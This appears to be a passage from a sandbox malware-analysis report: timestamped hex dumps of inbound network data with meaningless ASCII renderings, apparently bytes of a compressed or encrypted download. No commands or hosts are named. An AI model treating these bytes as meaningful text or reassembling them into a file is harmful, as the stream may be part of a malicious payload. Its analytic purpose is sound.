ae 82 77 0a 76 8f db ea 9c 5e a2 b2 26 5c 89 17 51 c0 9f 1e d9 01 94 93 73 93 f2 c7 0d 76 05 47 df 10 4b 0c f7 39 bd eb d3 ff ca f8 65 27 20 fa cc 63 d7 7d c6 6e e8 ec cc 22 61 b9 76 7e 84 ff 47 12 Data Ascii: <0t5\|Zw[(w{wvNgip!a&ovK' rd+QPm\|\mEj7tb$[9bou---dr>R-oQTjSS_Z4(V(;\| 0o^5i^wv^&\QsvGK9e' c}n"av~G
2023-01-05 12:18:10 UTC	633	IN	Data Raw: 5d 4f 36 fe 26 23 d6 d1 a5 ee 37 44 08 85 42 88 0f 1f 0e 34 df 6b 99 71 10 12 53 7c af 72 42 5b 95 ef 2f ae 9b 5a da eb bb 01 87 8c 0f 4f 17 33 cd 0b 5a b9 f9 37 d7 b9 cd 2b 7b 1e ec d5 47 29 a4 b5 81 0e 7a f8 8f 6d cb b3 cc ad 8f 25 1e 87 7f 82 e4 1e 21 4f 17 96 85 8e d3 92 a7 64 6e 51 26 f1 d2 b3 12 e7 a5 ff 82 40 c9 be c0 ed 65 22 01 ba b7 ba 94 4e b2 1d 77 6c dd 16 83 39 83 b4 f6 53 fb 2b a6 c2 fb 8f 78 7e 97 fe e2 4c 1d 7e 5d e7 c2 57 28 9f 22 b3 7d f1 6d 6d 34 e5 54 e6 05 a5 04 53 2e ed 6f b6 83 df 44 5b 97 f0 6c 69 fe ca 4c 77 57 75 b5 2d dd 6a dd 06 2f 3a 0e f7 01 5f f3 1e 67 fc 19 f3 a1 db e3 f6 92 fe 5f d3 fc 6b b9 3d 23 4b cf 99 aa 5d d1 bd 33 e1 9c c1 63 7e c0 eb fd d9 d6 99 26 77 ba d1 45 30 0f 7f f5 23 a7 97 f3 75 ed 24 1d e9 df 6e a9 4c 6e Data Ascii: ]O6&#7DB4kqS\|rB[/ZO3Z7+{G)zm%!OdnQ&@e"Nwl9S+x~L~]W("}mm4TS.oD[liLwWu-j/:_g_k=#K]3c~&wE0#u$nLn
2023-01-05 12:18:10 UTC	649	IN	Data Raw: 49 83 c4 cf 90 af 8d 45 dd 21 c4 af 23 3e 30 8a 9d 49 c7 ac 63 89 76 d7 3c ac 97 7b fb 25 6d 6a c6 6f fc c6 f7 bc 75 d6 61 2e e6 ce 2a c7 2a c1 b6 60 25 23 e0 9e 0d eb bc b4 40 f6 4a 9a b6 0a c3 35 6a a4 ca eb ae d3 38 f9 d6 7e 0a 6d ff fe 15 68 9b 8e 04 4f ac 72 8b 1a a8 e4 8f f5 72 b2 04 fd 27 4e 0b 8e 30 79 66 a3 b9 51 3c ba 31 2f 30 2e 22 b0 30 44 ae 63 42 87 e8 6b 4a d6 89 50 e3 67 41 25 c6 66 17 a0 00 b3 1d 23 ad 64 d7 79 9c ee ba d9 b6 34 93 96 8c 70 63 11 03 0c 6e f2 a9 f9 e4 eb c5 a2 8e dd b6 b8 e4 8b 2a ef 72 cc b6 0e b2 33 e2 7c e6 f9 93 78 a0 c4 2b 5f 3e a2 a7 47 ca a5 f5 c2 82 a5 6f c3 72 43 dd ce 54 74 94 d3 a2 67 94 c5 2a 0b 83 80 ea a8 b9 58 55 96 d3 7c e1 e7 ca 56 d1 b6 a9 64 e0 36 37 6d c5 37 ba 35 3d 31 7d ff a7 9d a2 64 05 b5 9b e7 47 Data Ascii: IE!#>0Icv<{%mjoua.*`%#@J5j8~mhOrr'N0yfQ<1/0."0DcBkJPgA%f#dy4pcnr3\|x+_>GorCTtg*XU\|Vd67m75=1}dG
2023-01-05 12:18:10 UTC	650	IN	Data Raw: a0 e4 c8 4d 4b 2b 91 5f 63 44 ef a6 1a 25 e9 b9 88 93 ae 6b c9 66 0f 4b 47 47 10 11 7e e5 a8 ea df 76 6f c1 cf d5 6f a6 9e f3 6b 6a d9 ea 9b 7a f8 cb 79 81 b1 61 db f1 30 d5 e4 36 b9 e3 f3 10 82 bd 4d 25 8e 68 87 5c 57 43 b8 e5 82 d6 59 44 dc 69 2e 1c 52 aa 08 0b 7b 3c fc 79 bc 16 74 36 22 f9 5f a6 6b ac 60 4a 96 85 6a 40 8b 87 b4 9e 7f ed ce 15 45 d9 dc 29 6d 75 cc 6b c1 8f 3a 32 ca e0 cb 0a 7f 3c a2 2f 81 e2 4d fd e4 7a 2b 61 61 55 3b a9 9a fe f1 9b 1c c2 97 5f f1 93 8a e9 c0 fe 47 1b af 11 31 fe 44 8e 19 93 65 42 ae a9 6d 89 a7 fc 5f 6e 18 aa b7 e9 13 1a e6 be 98 63 f3 b3 26 61 b7 e5 a7 d3 83 ca 93 1a e9 22 49 08 ae 72 3c 51 92 c6 59 43 14 c3 a2 64 51 ab 33 55 d2 27 ad d2 b5 9f d7 fd 64 dc 9e d5 7c 1c 2f 04 56 dc b4 23 71 7a 84 1c 77 20 06 df 25 1c 9f Data Ascii: MK+_cD%kfKGG~vookjzya06M%h\WCYDi.R{<yt6"_k`Jj@E)muk:2</Mz+aaU;_G1DeBm_nc&a"Ir<QYCdQ3U'd\|/V#qzw %
2023-01-05 12:18:10 UTC	666	IN	Data Raw: db 22 2e 7e 75 9a 36 ae f4 cb 9a ac e5 4d 0b 73 fd a6 9e 96 e3 3c 9e 59 36 fb f0 a6 6a e9 dd ab 38 e1 34 9f ae cb 73 b6 df b9 dd 3e e3 c8 41 fb 96 d5 3b 1b a2 cf 17 97 c7 a5 eb bc ae fa a7 86 3d 2c b5 39 22 32 f2 eb c1 f7 ae 0a e7 63 b9 65 de 17 cf bb ae 2d 76 b8 aa a0 16 78 e7 60 f0 47 c7 a4 d3 4f 56 19 8e a5 72 43 46 1e ca 72 3e 97 58 3e ae be be 8f 76 6f ce ba 80 93 73 57 85 4b 65 3c 8f db a2 fa 0f cf 2a ba 6d 3a dd fa 88 47 7e a7 7a 85 d2 b5 a5 ed 97 4e 1d 39 25 65 ea 65 34 ed cd ca f4 b9 11 fd 05 d9 f7 2f 37 85 bd 7b 7d f1 7b 5d a3 f6 0b cb db d7 2e fe 6e cb bb 31 77 d5 dc 0f f6 a3 a7 e6 25 5d b3 1b d5 44 4b 33 b6 32 9f 7e 4b 4d ee c0 ae 8a 25 c5 0e a9 09 e7 0f e8 2e f6 50 0e 8f f4 d6 ff 52 eb b0 f8 d0 3a eb b0 de 1f 19 17 1b e6 4c bb 77 29 6f e5 cf Data Ascii: ".~u6Ms<Y6j84s>A;=,9"2ce-vx`GOVrCFr>X>vosWKe<*m:G~zN9%ee4/7{}{].n1w%]DK32~KM%.PR:Lw)o
2023-01-05 12:18:10 UTC	667	IN	Data Raw: 38 71 8c 73 79 5c 83 d9 e7 d7 bb 34 95 93 4d f6 3b 5a ee 9e 7e d0 6a e3 9c 11 1a 65 71 ef 2b 7f 3e 7f 9f 57 d8 dd 9f 2f a1 d4 da 21 a5 3f fe 82 ea 62 fa 9c 35 67 6a 1f 1f ac 33 df 4b 53 be 6f 39 ac 40 21 ff c3 1d a9 2f 67 4e 5f 57 1a 33 bb f5 94 cd 4b eb 1c 37 3f 6f b5 e8 68 cb 8c 61 34 e7 9b 09 3f 7d 37 69 cb 48 6e f8 78 28 93 22 38 d6 11 e7 67 1f fd 7d e1 eb 95 6f ea 97 d5 6d a0 7d ac a0 19 ad 1f fa 24 62 d3 9c 86 a1 eb e7 94 77 2f b1 3b b3 e9 ed 0d 8d 9f 9f 0b 93 29 87 f4 2d e6 7f 8a a2 cd fd 9a b5 b2 6f 6d 63 96 ec f0 ab 7f 0c c7 4c 35 f1 2a 0a 0a 8a 3f fb f1 7d e8 e2 90 84 c8 b3 89 ae 4d 73 62 62 d4 8d d6 a5 58 bd f3 9b 60 71 bd ab e5 c6 37 ee a8 21 37 e5 a8 3f 7a 24 d6 b6 7e bb 62 7f 63 89 e5 be 49 7d a7 25 63 2e d6 9e 55 7c c5 ed b7 fc 59 73 a5 5f Data Ascii: 8qsy\4M;Z~jeq+>W/!?b5gj3KSo9@!/gN_W3K7?oha4?}7iHnx("8g}om}$bw/;)-omcL5*?}MsbbX`q7!7?z$~bcI}%c.U\|Ys_
2023-01-05 12:18:10 UTC	683	IN	Data Raw: 2f 84 f6 91 35 24 c5 8a c3 b0 e6 32 b7 75 fe 2b fe 5a 50 fc f5 0b 77 49 e0 98 78 49 e7 a0 49 6d ae 46 d3 62 0b 6d ea 0e a3 ea a9 b8 42 e3 d1 60 d9 dd ff 7c 25 d8 36 34 6d 3b be 15 ec 44 56 27 43 b4 7c 01 5f 6b c7 11 d0 94 89 2d 40 45 f0 bf 33 3e 0f 05 27 74 f5 4c f0 f0 0c 91 19 c5 90 43 46 b6 01 09 ee f9 1f 08 77 4e a9 69 21 a0 f8 57 36 e0 e1 4c 35 d5 10 8c 29 47 e0 48 82 39 80 60 6c 72 9d cb 40 41 ce b4 91 78 98 61 22 cb 1e d1 aa 21 7c e7 30 8e 60 12 09 9e 03 e1 a9 c8 3f 7d da 76 cc 1d 75 d4 f1 d5 47 97 93 3a 2a 50 f9 ef 8e ca 52 16 db 51 f2 10 5d 5c e7 bf 51 ad f6 0b 6f e2 95 f3 b7 0e c4 e0 5a 2c 35 69 70 27 7c b1 1d ee c9 0b f8 04 48 7b 5e b2 05 73 f6 d6 28 e3 eb 61 8b 98 8e 25 fc 47 9a 45 c3 d6 7a 61 5d 6c 39 82 3c 52 5d 92 20 0e c1 33 c2 4d 35 73 b0 Data Ascii: /5$2u+ZPwIxIImFbmB`\|%64m;DV'C\|_k-@E3>'tLCFwNi!W6L5)GH9`lr@Axa"!\|0`?}vuG:*PRQ]\QoZ,5ip'\|H{^s(a%GEza]l9<R] 3M5s
2023-01-05 12:18:10 UTC	684	IN	Data Raw: a8 ec ae d8 4a b0 52 b0 19 6f 99 88 0c 14 47 5f f0 79 19 3e d2 e7 2a 9a ad be 42 40 0a 65 26 e2 44 8f 68 d1 5c 96 0a 7d 69 86 2c 97 b9 1d 8b 50 56 31 fc 0a 22 6a 9e 96 e1 28 54 8c eb 86 14 c6 f5 0c 86 ca a2 a5 9d 12 12 99 53 10 99 b0 1d 37 74 15 5c 42 14 7e 02 11 0d c4 76 7c 2f a6 1d 8d d4 c4 b6 23 05 4d 7e cb c4 aa a1 76 4c 39 f5 0c 17 aa c8 ac ef c1 04 88 18 7b af f6 77 3c be 95 3e e6 f1 23 39 1b 3d b0 d6 87 ad d0 3b a3 35 1c c0 f3 4d 1e 2f 4f 03 27 f6 5c 4c e5 00 9b 0e 73 23 3e e0 68 cd 76 44 ab 45 ce aa 87 67 71 b9 60 87 f7 db 75 3c b4 0d 33 3e b4 c9 8d cf 05 ab 0d 57 fe e1 f2 cd e5 f4 c5 48 19 da 29 fa 40 24 41 68 97 ff 5e c8 c6 b0 a6 94 53 28 ce ef 0e 5a a3 33 37 d9 f9 1e 9c 88 4d 30 c7 f7 bc 24 36 5a a2 4e 77 54 23 b6 26 17 c9 c1 ee fa f3 5f 40 4b Data Ascii: JRoG_y>*B@e&Dh\}i,PV1"j(TS7t\B~v\|/#M~vL9{w<>#9=;5M/O'\Ls#>hvDEgq`u<3>WH)@$Ah^S(Z37M0$6ZNwT#&_@K
2023-01-05 12:18:10 UTC	700	IN	Data Raw: 8e c6 9c 27 85 dc 77 23 c1 1e e3 7e de 0e 14 9e e2 12 56 0c 14 25 45 bd c7 12 e6 ad 41 2b d8 8f 3c c5 1c 41 3e 06 54 2f 05 67 27 ce db 44 e8 7b 49 c9 01 2f ce 1c 83 86 7d ff d6 53 cc 11 e4 c5 df fd a8 e0 9a a1 2d c1 cd 96 25 bf 1b 8a d1 4f 12 f4 38 61 aa 40 cc b1 01 a9 c3 63 71 e9 b3 99 e6 08 f3 d3 d3 8f bd c1 ba c0 cc 6d 04 55 17 e9 ff 6f c0 02 16 7f 43 f7 fa 3b 84 11 e4 6e cb 4c 05 2e a6 f5 33 09 2a 43 98 10 8d 17 79 59 06 da 5b d8 56 07 40 02 3e 8b 39 53 16 d8 c9 13 57 67 38 e2 33 af a5 20 bc f7 ca b6 7b 83 49 35 8a 84 19 6e 2a 5d 9b 8d 05 06 59 c3 5e 43 47 1e 61 81 e1 4c 12 ea 19 48 1d a1 a1 c9 c0 17 60 1b 5c 95 0e f7 12 f2 1e c9 0a 26 7b fd ad 36 92 bc c4 aa 0d 29 8c 50 73 cc 4f 98 39 c3 09 97 0f 85 d9 88 d4 06 7d d9 75 79 70 b4 ed fe 31 3c a1 4a b4 Data Ascii: 'w#~V%EA+<A>T/g'D{I/}S-%O8a@cqmUoC;nL.3CyY[V@>9SWg83 {I5n]Y^CGaLH`\&{6)PsO9}uyp1<J
2023-01-05 12:18:10 UTC	701	IN	Data Raw: 0a 41 98 e6 fe 7b 04 d9 92 a4 63 7a 02 33 7f 5e 92 88 08 43 60 af 75 94 6e 83 9c 04 9b 17 78 30 59 e2 2a 13 66 59 7c 21 41 db 61 d3 ff ba 72 ea 60 c3 5d 6f c2 c1 4a 74 e2 9a 18 76 24 7e 9f cf df 3b 01 24 35 07 b3 29 2c eb b6 c2 45 7c 30 5f f4 60 3a bb bc 51 19 ef e4 df c6 ee 12 f7 b6 1a 0e e6 92 93 1c c8 35 8c 71 86 94 7b 1a 9a d4 29 a9 a4 a7 ca d3 80 73 cc 84 9b a0 7d f3 10 01 30 d3 dc eb cc 06 ec 78 db 42 1e 17 7c 09 38 63 c1 e7 43 af 9a 0b 62 d3 87 5c e7 80 48 79 e3 fe ff e1 74 ba 00 51 86 e0 91 28 13 19 64 6a 6c 3f 0d 8a c2 07 85 75 e9 ba c0 7f da 6c 33 1c 8c 82 0d 4a 26 a7 ee 4b ac 38 4a 4d 2d 65 10 28 a4 12 b2 ef 26 f6 08 6c b2 c7 e4 f0 68 c2 51 f5 4c 6f ec 18 ba c9 ae cd c0 ea c3 3c fc 46 1b 45 49 29 ac 4f 51 c6 39 1b 12 76 95 81 dc a4 72 14 7f d1 Data Ascii: A{cz3^C`unx0Y*fY\|!Aar`]oJtv$~;$5),E\|0_`:Q5q{)s}0xB\|8cCb\HytQ(djl?ul3J&K8JM-e(&lhQLo<FEI)OQ9vr
2023-01-05 12:18:10 UTC	717	IN	Data Raw: e1 5e 91 7a cf 71 f5 29 cf 96 ee c5 5f 7d 46 95 a7 42 6c da e5 37 2c 56 72 f9 55 a0 1d d6 51 ef e3 86 f6 31 d4 a5 6f fd 96 64 1b 1f a3 35 0b 72 d4 be b7 93 e7 40 ce 8d 6d 8c 02 46 d4 f8 b2 39 92 e7 88 08 f1 1a 97 75 e5 56 4f 3f 42 e6 8d 0e 41 a4 bc d6 4c 93 6a 13 11 b9 49 04 b3 03 61 3e dd 1a 4b 88 5e 7e 74 3f 81 8c 53 fb b1 79 b8 4f 89 40 86 22 88 36 8c 99 06 be 96 5c 02 bf 68 df fb 99 d8 cc e1 f7 45 20 f5 68 19 49 56 0f 75 29 e8 c5 ae 91 a7 09 64 1c af 60 f3 4c 5d da e8 7d b4 44 1d f2 ef a4 be 44 1d fa ef ac bf 44 4d f5 06 98 6c fd 71 d0 17 7a f9 26 d7 84 be 47 3a 84 e1 95 b3 0b 12 eb 76 f3 07 ff 25 8b 87 40 0d 75 92 8e a8 5a 98 aa d8 58 b6 fb 6c 3b d9 1d fd 24 98 14 b3 4c ac 24 ab 2b 27 e7 89 17 c3 19 75 5a ca 59 d9 32 80 ab 57 ba 9e 7c 06 13 66 46 af Data Ascii: ^zq)_}FBl7,VrUQ1od5r@mF9uVO?BALjIa>K^~t?SyO@"6\hE hIVu)d`L]}DDDMlqz&G:v%@uZXl;$L$+'uZY2W\|fF
2023-01-05 12:18:10 UTC	718	IN	Data Raw: f0 37 d5 56 86 d7 0a 75 70 8d 1a e0 fe ca 97 e7 59 b3 ab c1 ac 05 cd 88 1e 1a 98 7d 34 20 03 e3 64 6c f0 aa a1 6c 22 b8 db 7d cf ed 64 a0 f0 9f 29 16 06 9e bb 37 c5 3a ec a0 ca 18 b4 02 5e 55 0c b8 02 ab 63 bb 96 67 a0 59 86 c9 e5 61 d3 e3 27 77 ed 0e c6 1e e1 97 9e 8b 1d 26 44 d4 92 a6 6f 70 0a 34 46 9d 65 e1 d2 aa 50 53 a5 02 e3 0e b5 73 f4 d0 f7 cb 53 7e 52 81 66 b8 13 f5 94 3d dc 08 8d 0b 95 08 15 08 56 6d 88 cd 97 a6 6c b3 f5 4e eb 29 ab d5 50 6e 74 36 5c 7a 17 e9 1a b6 f4 a8 30 6a 40 81 78 53 be 3e 8d 87 79 ca 41 1d 84 1b ab 42 6d 39 e2 bd 8a e8 26 c2 8d e5 f7 3d c3 04 0f 4d 6a 98 ad 59 b8 92 0b ae d0 71 c1 15 e8 29 0b ad ba 9e 7d 07 0f be f5 14 9c 71 55 66 d6 54 37 4f 84 ba bb 37 bf 4a 5d a2 b2 d4 25 73 14 6c 08 f6 55 ba 17 a0 28 45 11 05 49 1b ff Data Ascii: 7VupY}4 dll"}d)7:^UcgYa'w&Dop4FePSsS~Rf=VmlN)Pnt6\z0j@xS>yABm9&=MjYq)}qUfT7O7J]%slU(EI
2023-01-05 12:18:10 UTC	734	IN	Data Raw: 6d 70 a0 8f 6f 35 a7 03 16 8f da 37 19 a6 de dd 58 c4 c5 d8 c0 b1 b8 77 1b 78 1c 34 ef ba 0d 4a c5 7e 3a e7 74 38 d1 71 2f 3e 7b 9b ca 4e 88 6d f6 c9 0f 98 73 97 ae 39 e8 ad 68 7a 15 2a f3 f9 b0 75 72 be 70 d7 0b 98 fb 74 34 77 2b ba 8c bb de b7 62 21 4e 22 85 66 36 86 93 97 22 05 c9 d1 94 4a 7a b6 d6 53 bb fb 6e 11 b1 d0 72 a9 d0 98 e7 78 f7 28 e7 8f a5 51 c8 44 e7 4e 8f 7d c2 67 22 ad e7 a2 04 0f 19 97 48 f2 d0 43 29 5b a1 d7 8d 75 fc c0 16 19 b0 85 e6 79 8b 06 0a 5b c8 b3 24 6d 0b 9d a5 5b 48 c0 53 88 7e 6e c5 2b b0 e5 56 29 61 49 6a 3a 1a 2a 64 e8 1d cb d0 25 c2 01 57 c2 be b1 76 86 7a 3c d3 50 fb b8 53 25 b0 57 ce 8d 97 26 08 7b 35 5b a2 57 77 a5 7b f5 32 09 e3 df ee d0 92 6c 05 3b f6 e6 fb 75 9f 4f a2 24 59 2b 49 92 ab 95 c2 a9 0d 49 16 b9 47 74 8b Data Ascii: mpo57Xwx4J~:t8q/>{Nms9hzurpt4w+b!N"f6"JzSnrx(QDN}g"HC)[uy[$m[HS~n+V)aIj:d%Wvz<PS%W&{5[Ww{2l;uO$Y+IIGt
2023-01-05 12:18:10 UTC	735	IN	Data Raw: a1 72 08 cd 62 c5 ad 04 4b 22 eb 4f a9 2f 32 69 21 ef 9d 96 d8 6c b1 3e 45 86 c0 85 06 cf 05 f1 95 be c1 7e ec 35 d8 49 51 63 51 08 12 39 e8 be 12 ea 77 bd 2b 48 f7 13 6c 54 ea dc f7 b9 31 06 33 9e 44 11 e4 27 3c ba 3f cd db e7 3a b4 5f 5a 3d 98 0f 69 48 a8 4f 76 58 7f 15 dd 6d 2d 65 b1 98 e2 03 2e 3e cc c0 78 be 88 f0 ac 26 78 42 68 9e e1 28 9f 60 72 74 5f f4 6d 75 02 6f 4c 63 7e 73 92 a6 ee a1 05 e1 c8 0c 3f 1a 44 0d 11 31 83 61 85 84 9a bb 42 92 19 4a 62 af cd c6 2a 8d e1 5e de 85 02 43 5a 88 31 f5 90 42 cd e1 ad 56 08 fb e9 83 c6 93 58 c1 43 53 06 f8 f3 65 49 12 bb 48 cd 34 fc cd 68 26 8a 28 86 b7 8c 14 be 19 0a 0b ce 86 1e 66 df cc 48 ef 43 8c 19 1d d6 f5 68 ef af bf 6c 45 0b c8 3c b3 53 6b 7e 6f b2 18 b5 a9 82 c8 f2 10 f3 1d d0 d8 87 f9 a2 4e 75 41 Data Ascii: rbK"O/2i!l>E~5IQcQ9w+HlT13D'<?:_Z=iHOvXm-e.>x&xBh(`rt_muoLc~s?D1aBJb*^CZ1BVXCSeIH4h&(fHChlE<Sk~oNuA
2023-01-05 12:18:10 UTC	751	IN	Data Raw: 23 0d 0a 1f 41 2c a9 80 c9 48 3b 69 a9 55 92 34 7e 9e bb 63 21 b1 25 4c ff 6e 28 c7 96 6f 74 02 78 7f 50 a6 18 b0 76 3f cc b1 45 9f d0 f9 6f 9c 27 1d 99 1f d5 56 d4 b2 8b 6e 91 13 7e cb b8 3f bd db 65 b6 bc d8 56 eb 07 d7 b7 46 9d d8 f6 76 6a 6d be fa b6 aa 36 a7 c4 bc e2 41 ae 32 53 30 dc 0f ef fa 5a 1a 75 21 46 9d 2b 43 70 1c 51 df 28 ff dd 27 f0 74 b9 67 79 39 f5 31 a4 99 62 04 f1 ba 82 66 4f 82 18 91 e6 9a 1e aa 55 72 9b 27 87 f0 0e 6d 4b dd e8 2d 88 ef 15 30 94 bb 3e d8 3d ca a4 a1 78 6f ee ed 87 c8 b3 04 6d a3 4c f0 4c ae ed 4f 3a 87 50 db 97 67 19 a8 57 b4 5d 77 47 e5 e4 e9 8e 6a db 5b d1 05 f6 fb ee f9 37 43 89 49 e7 9c 72 fa cc a1 d4 d9 66 41 14 ee f0 e4 e5 27 90 a9 03 d3 ee 82 5a 76 6f 2e 9f 9b e9 ef d8 63 22 6a 12 44 51 01 fc 8d 3c 6d 2e 5e b1 Data Ascii: #A,H;iU4~c!%Ln(otxPv?Eo'Vn~?eVFvjm6A2S0Zu!F+CpQ('tgy91bfOUr'mK-0>=xomLLO:PgW]wGj[7CIrfA'Zvo.c"jDQ<m.^
2023-01-05 12:18:10 UTC	752	IN	Data Raw: 8f 32 42 96 4e dd 6b c8 f1 7b 24 24 49 f8 3d 04 b1 bd 02 bf 9d 4e 23 af e2 9a df 07 e2 c2 c6 ac 91 29 dd 0a f8 26 c8 4d 1f a5 71 4b e9 db 12 b8 70 e9 c7 f6 52 74 5c 03 a7 87 f5 ed e7 07 f7 e7 77 a9 e0 05 b7 3a 67 6c 00 b1 d7 96 8d b6 41 35 fd ab 74 4e 1b 1c 48 3c 18 ca ee fb 62 d7 cf ed ed 80 6f 2d 22 45 08 2f 3f 71 1f 0e 2c cf 62 8e 65 30 76 b6 3e ab 60 87 b8 a7 25 ca 38 61 60 fe 0f c5 b0 e8 ef fc de 00 b3 2e 5e fe 24 c0 95 4d a3 bf 83 65 67 ef 60 bb 15 ff 73 40 83 3f 0f 1e c1 83 73 e6 74 02 ee 91 47 b4 99 11 6b c7 ee 8d 08 54 e9 5f ba 31 d8 87 f4 8d c0 ef 11 6e 52 80 90 7c a8 3b 9e bb 49 47 4b 59 90 93 14 7d bf 11 3e 33 b9 22 23 34 d3 48 5b b4 97 ae 3d b5 a5 01 59 f0 e7 fd ac cf 0b 39 33 6d bc c8 f7 56 d7 94 e5 11 eb b2 81 0a 96 52 28 46 2d e3 69 94 9b Data Ascii: 2BNk{$$I=N#)&MqKpRt\w:glA5tNH<bo-"E/?q,be0v>`%8a`.^$Meg`s@?stGkT_1nR\|;IGKY}>3"#4H[=Y93mVR(F-i
2023-01-05 12:18:10 UTC	768	IN	Data Raw: d8 36 14 c0 7f 66 cd 3c 3f d9 e1 7b 9f 02 dd 15 e3 c9 12 a8 62 0f 10 a8 3a 9e 7a 12 46 89 57 38 46 37 8d 2b 33 86 70 46 9f 4b 28 af c0 39 5e 05 e7 45 75 9c 91 84 33 d2 98 85 71 b6 45 b1 f2 2c b8 62 c2 de 61 b1 1c 67 93 e8 8a cf dc 95 ae 84 23 4d e9 53 2c 13 bb e8 f6 cd 61 f7 87 3b fb 70 07 4e 96 73 14 10 f8 25 c7 10 53 53 18 e3 d6 e0 9d a4 bc 9b 21 cb 9a 0a c6 66 76 cb 12 ba 77 5b b6 2b d7 7a 28 dc a9 36 97 55 ae 9c 34 4d d3 51 42 39 41 4c 54 70 b7 c3 07 36 5e 17 60 37 98 71 c0 ce 97 a6 9e 2a 53 bb bd 23 82 36 1d ed 3d 94 23 a8 38 55 b3 bd d6 cf 4b 70 66 f0 49 2e 9c 81 68 8c 30 d1 f1 b4 28 88 41 46 be 0e af 0f 4c 7f cd 92 e9 af 28 67 43 37 aa 60 e1 a4 aa 9d 14 4c 8f 32 a6 66 7a 5b a3 2a d3 d7 53 b0 e2 97 9f d2 e7 83 f5 b9 2b ca 6d f3 4d 4e d7 21 43 7a 73 Data Ascii: 6f<?{b:zFW8F7+3pFK(9^Eu3qE,bag#MS,a;pNs%SS!fvw[+z(6U4MQB9ALTp6^`7qS#6=#8UKpfI.h0(AFL(gC7`L2fz[S+mMN!Czs
2023-01-05 12:18:10 UTC	769	IN	Data Raw: 80 5f 1f 5e 3e 84 0f bd 17 70 fe 08 f5 0c a1 4d e9 32 a9 1e ae 59 15 7c ce 41 40 23 3a 9b da 81 bd ec 34 37 39 50 95 e4 35 36 f5 50 15 5c 8c 2a 20 3f 3e 97 8e c4 b2 0f b9 d1 94 e8 e1 0f fd 90 9e 0b cf e9 ca c2 04 ef 3d 37 0a b2 86 ec 7c ce d8 b1 8a eb d9 15 9d 5e b0 7d aa 76 51 a5 0e 8a be f2 35 a7 ee ab ea 66 d5 be 6a fa 9c 16 14 f7 fd e6 41 d9 59 f2 f0 50 56 53 77 b3 29 3b 36 a3 bb 20 36 37 f3 cd 88 79 9e 7c b7 89 64 54 fd b9 df 4e 64 54 3e 59 b5 b1 82 8c 6e 2a 64 6c 57 27 e3 fa 33 9c ef cf 73 f5 98 ba 40 7c a6 86 9d a4 f9 be 2b 52 d2 45 30 76 b5 5b d6 62 49 63 78 7c 3a 69 dd d2 eb d2 7d 16 34 75 e2 b0 2d b3 15 b5 3f 57 a9 3d 3a 54 b5 76 81 70 7a 27 47 07 d9 3a fb dd 67 b6 4b e8 7e 3a ab 02 67 c9 d0 d4 38 07 aa e3 d4 3f 4b 59 72 23 4e db 63 b7 9c 84 b3 Data Ascii: _^>pM2Y\|A@#:479P56P\* ?>=7\|^}vQ5fjAYPVSw);6 67y\|dTNdT>Yn*dlW'3s@\|+RE0v[bIcx\|:i}4u-?W=:Tvpz'G:gK~:g8?KYr#Nc
2023-01-05 12:18:10 UTC	785	IN	Data Raw: 58 99 da a9 a5 71 48 6d 55 69 ac 94 28 57 ee 0f 4d ef 33 13 ca 8a bf 97 f1 01 44 32 25 a6 cc 6f 7a 4d 70 f2 9d 83 fc 90 4f 17 bf d4 9d d9 46 f9 6a 28 1d f6 52 7a 9f 86 99 46 c5 d1 da 03 02 5e 4c dc 82 ea fc 6b 81 e5 79 8d 7a 88 3b d0 2a 0b 2e a7 0e 2c bb 36 d4 09 47 b6 8c d2 0a 60 bd 5d bd 07 e4 3b 1a d3 51 00 53 9d 13 9b 61 58 f8 b0 8f 76 5c 02 c1 9c c8 66 91 02 9c 58 bb 27 00 b6 f6 f5 b4 d8 ec 36 3a d0 f3 55 91 15 5f 97 5d 5d 66 97 6c 1c a5 09 0f 3f 5f dc d8 81 a2 e6 02 7e 57 73 d9 55 b6 c2 ae 1c 4a 72 f3 9e a8 7b d0 6a c3 31 28 77 76 d5 21 ae 27 cc 3e d2 e9 d2 9c da a9 17 98 30 a6 cd 3b 0b 54 6e 70 80 db 56 f8 d3 fd 95 74 a4 b6 45 01 44 f3 1f bc 1b f0 60 05 d4 b9 f2 fa 0c 27 6d c1 ae 33 b5 13 0a 90 d3 89 c9 53 aa 67 7c 91 64 51 f2 85 3e f9 62 65 ed 66 Data Ascii: XqHmUi(WM3D2%ozMpOFj(RzF^Lkyz;*.,6G`];QSaXv\fX'6:U_]]fl?_~WsUJr{j1(wv!'>0;TnpVtED`'m3Sg\|dQ>bef
2023-01-05 12:18:10 UTC	786	IN	Data Raw: 62 5c 66 56 06 16 de 45 69 fb fc d3 65 fb ac d7 18 93 9f 45 8d d1 68 f4 11 e0 1e 26 c4 47 e1 ee 2c 39 cf 8b 57 8a 2d 75 49 36 9e a5 e7 01 9a 91 61 1a cd 72 a5 3d 63 0f 5c 35 83 77 96 31 4e 53 a8 31 14 02 bf dc fb 0c 4f 96 5c ba 2c c0 9e 66 e1 93 71 a9 51 e9 52 c6 9f b0 e4 7d b5 c7 82 15 d6 2d 7c fc 00 be 5f f2 d9 68 85 7c ed 5b 1e c5 1d 44 86 2e 67 72 40 ad 07 e3 32 58 21 7a 65 9a 51 d0 2f 24 7d 09 d4 a3 65 3f 57 fc e1 80 1a 4f 7f 5f b4 d9 70 01 eb 80 52 fe 7d 8b 52 87 9a 23 5a a9 f4 68 2b 24 b0 2e 6e ad 4e 62 cb 2e 99 34 9a 08 ec 62 77 e4 c2 0a 5c 31 19 42 35 9a 3e 94 a1 39 40 a3 f1 0b d1 68 ee 20 47 7a e9 a5 4c 2b 59 71 17 5f 12 9f 3b 11 ae 3d 8a 44 7a 33 fe c6 e7 bd 28 4c 11 72 e1 59 90 e4 f7 91 0d 67 89 23 d8 ce 00 9c 8d be e3 fb bb 81 1a 4d 5f 84 35 Data Ascii: b\fVEieEh&G,9W-uI6ar=c\5w1NS1O\,fqQR}-\|_h\|[D.gr@2X!zeQ/$}e?WO_pR}R#Zh+$.nNb.4bw\1B5>9@h GzL+Yq_;=Dz3(LrYg#M_5
